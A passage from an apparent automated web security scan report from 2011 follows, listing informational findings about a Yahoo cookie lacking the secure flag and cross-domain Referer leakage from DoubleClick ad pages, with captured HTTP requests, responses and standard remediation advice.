GET /Contact.html HTTP/1.1
Host: www.advantageip.com
Proxy-Connection: keep-alive
Referer: http://www.advantageip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:37:33 GMT
Server: Apache
Content-Type: text/html
Content-Length: 10011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<hea
...[SNIP]...
<div style="display:block;" ><form id="wstForm_Contact" action="https://sitesupport.websitetonight.com/formmailer.aspx?projectid=2065113&websiteid=19666395&emailid=" method="post" labelid="formLabel_ContactForm">
<table width="100%" style="background-color: #ffffff; border-collapse: collapse;" border="1" cellspacing="1" cellpadding="5">
...[SNIP]...
17. SSL cookie without secure flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /adui/signin/displaySignin.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /adui/signin/displaySignin.do HTTP/1.1
Host: marketingsolutions.login.yahoo.com
Connection: keep-alive
Referer: http://advertising.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:45 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: JSESSIONID=C08D800A7F9FFF726A8F260F8117457E.; Path=/adui; Secure
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ALP=bTowJmw6ZW5fVVMm; Domain=.yahoo.com; Expires=Wed, 13-Jun-2012 06:10:31 GMT; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 34149

<html lang="en"><head>
<script type="text/javascript">
if (top != self) top.location.href = location.href;

document.domain = "login.yahoo.com";
</script>

<title>
Sponsored Search Lo
...[SNIP]...
18. Cross-domain Referer leakage  previous  next
There are 65 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

18.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.66.ALEXAINTERNET/B4971267

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N1558.66.ALEXAINTERNET/B4971267;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D959680%3Bx%3D2304%3Bg%3D172%3Bc%3D1219000019%2C1219000019%3Bi%3D0%3Bn%3D1219%3Bi%3D0%3Bu%3DlYrOTcGt89Yz1ao6zwEmLiof%7E051411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D1%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bq%3DALEXA_core%3Bz%3D0.7181504438631237%3Bk%3D;ord=0.5026219566352665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1219;c=19/1;w=300;h=250;d=9;s=1;q=ALEXA_core
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6780
Date: Tue, 14 Jun 2011 00:29:16 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Wed Dec 29 10:23:26 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D1%3Bg%3D172%3Bw%3D51%3Bm%3D34%3Bq%3DALEXA_core%3Bz%3D0.7181504438631237%3Bk%3Dhttp%3a%2f%2fwww.verticalresponse.com/landing/123tif/%3Finnovationinteractive/disp-2011-0101"><img src="http://s0.2mdn.net/1524255/delightedCustomers_100free_300x250.gif" width="300" height="250" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N447.153730.YAHOO.COM/B5548365.27

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N447.153730.YAHOO.COM/B5548365.27;sz=200x33;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*;ord=0.04136643558740616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 590
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 14:11:21 GMT
Expires: Mon, 13 Jun 2011 14:11:21 GMT
Discarded: true

<a target="_blank" href="http://global.ard.yahoo.com/SIG=15mb2d4v4/M=801902.14713345.14495286.13349988/D=my/S=150001785:RQ1/Y=YAHOO/EXP=1307981481/L=pCn7imKL8NLm3NorTdAdCwBurcHW8032GokAA_Py/B=FDJADWKL5Us-/J=1307974281291848/K=gRvxSKzfqEbroTIaTR.s5w/A=6407512/R=0/*http://ad.doubleclick.net/click;h=v8/3b25/4/ef/%2a/x;241858033;0-0;0;64369825;3011-200/33;42374177/42391964/1;;~sscs=%3fhttp://www.travelocity.com?WA1=03010&WA2=241858033&WA3=64369825&WA4=42374177&WA5=2995783&WA6=1093499"><img src="http://s0.2mdn.net/viewad/2995783/200x33.jpg" border=0 alt="Click here to find out more!"></a>
18.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5155.152847.2342166290621/B5116932.9

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adi/N5155.152847.2342166290621/B5116932.9;sz=728x90;ord=156694210?click=http://viacom.adbureau.net/accipiter/adclick/CID=0000040d0000000000000000/acc_random=379297/site=mtv.mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6397
Date: Tue, 14 Jun 2011 00:16:06 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Fri May 20 17:54:51 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
mtvi/aamsz=728x90/relocate=http://clk.atdmt.com/goiframe/200193601.202770770/mtvnsdrv0010001173apm/direct/01%3fhref=http://www.teleflora.com/?srccode=me_msnret_bt_ev11_ros_728x90&promotioncode=meed15"><img src="http://s0.2mdn.net/1819375/TF6033_Summer_EV_Banners_728x90_15.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
18.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5621.66.2412875475321/B4682155

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=959677%3Bn=1219%3Bx=3853%3Bc=1219000048,1219000048%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=lYrOTcGt89Yz1ao6zwEmLiof~051411%3Bk%3D;ord=0.7221405794844031? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 826
Date: Tue, 14 Jun 2011 00:28:50 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/c/b7/%2a/p
...[SNIP]...
u/index.cfm%3Ffa%3Dlanding.Combo_IM_3a%26mnc%3D564%26kw%3DRockStar%2520Combo%26utm_source%3DAlexa%26utm_medium%3Dbanner%26utm_term%3DRockStar%2520Combo%26utm_content%3DCombo_IM_3a%26utm_campaign%3DIM"><img src="http://s0.2mdn.net/viewad/2070351/Rock_Star_728x90.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...
18.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=1;tile=3;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 883
Date: Tue, 14 Jun 2011 00:13:50 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a
...[SNIP]...
89%3Bbsg%3D122690%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fhttps://store.marketwatch.com/webapp/wcs/stores/servlet/PremiumNewsletters_ETFTrader?dist=IYMLBTBCF" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/1146650/MWNewsletters_ETFBB_170x40.gif" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...
18.6. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=2;tile=4;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1049
Date: Tue, 14 Jun 2011 00:13:49 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a
...[SNIP]...
%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://ad.doubleclick.net/clk;239765443;62593204;n?http://save.ingdirect.com/promo/promo_set.asp?p=%9BKHUWN%A2&Redirect=90" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/3072305/INGD_WSJ_170x40_052011.gif" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...
18.7. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10001;mc=b2pfreezone;pos=3;tile=5;sz=170x67;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 829
Date: Tue, 14 Jun 2011 00:13:48 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a
...[SNIP]...
Bpos%3D3%3Btile%3D5%3Bsz%3D170x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3fhttp://ad.doubleclick.net/clk;235505086;58787601;p" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/2457383/100160_05_Pricing_EII_None_170x40agB.gif" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...
18.8. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/tech_front;u=%5E%5ElA;;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1280
Date: Tue, 14 Jun 2011 00:13:50 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...
18.9. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_front

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;ord=4904490449044904; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 512
Date: Tue, 14 Jun 2011 00:13:50 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/z;215935200;2-0;0;15527176;29332-377/140;41428528/41446315/1;;~okv=;;s=8_10001;mc=b2pfreezone;tile=2;sz=377x140;;bsg=122689;bsg=122690;;~aopt=6/1/ff/1;~sscs=%3fhttp://itunes.apple.com/us/app/wsj-house-of-the-day/id418203198"><img src="http://s0.2mdn.net/viewad/1146650/WSJ_WSJBC_HOTDipad_377x140.gif" border=0 alt="Click Here"></a>
...[SNIP]...
18.10. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=571x208;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 600
Date: Tue, 14 Jun 2011 00:14:11 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b26/0/0/%2a/p;241502695;0-0;11;2976076
...[SNIP]...
=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=4;sz=571x208;;bsg=122689;bsg=122690;;~aopt=2/1/ff/1;~sscs=%3fhttps://buy.wsj.com/shopandbuy/order/subscribe.jsp?trackCode=aaagprm2"><img src="http://s0.2mdn.net/viewad/3198123/Control_Snippet_creative_571x208.gif" border=0 alt="Click Here"></a>
...[SNIP]...
18.11. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/tech_main_story;u=%5E%5ElDlIlPlQlA;;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=1;sz=377x50;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1476
Date: Tue, 14 Jun 2011 00:14:12 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img src="http://s0.2mdn.net/1952284/Test_3_stacked_buttons_0212.jpg" width="377" height="50" border="0" usemap="#Mapfeb09_stackedheader" />
<map name="Mapfeb09_stackedheader" id="Map">
...[SNIP]...
18.12. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adi/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=3;sz=571x18;ord=8210821082108210; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1539
Date: Tue, 14 Jun 2011 00:14:12 GMT

<head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><img name="control_snippet_V1" src="http://s0.2mdn.net/3198123/control_snippet_V1.gif" width="571" height="18" border="0" id="control_snippet_V1" usemap="#m_control_snippet_V1" alt=""> <map name="m_control_snippet_V1" id="m_control_snippet_V1">
...[SNIP]...
18.13. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/interactive.wsj.com/tech_main_story

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

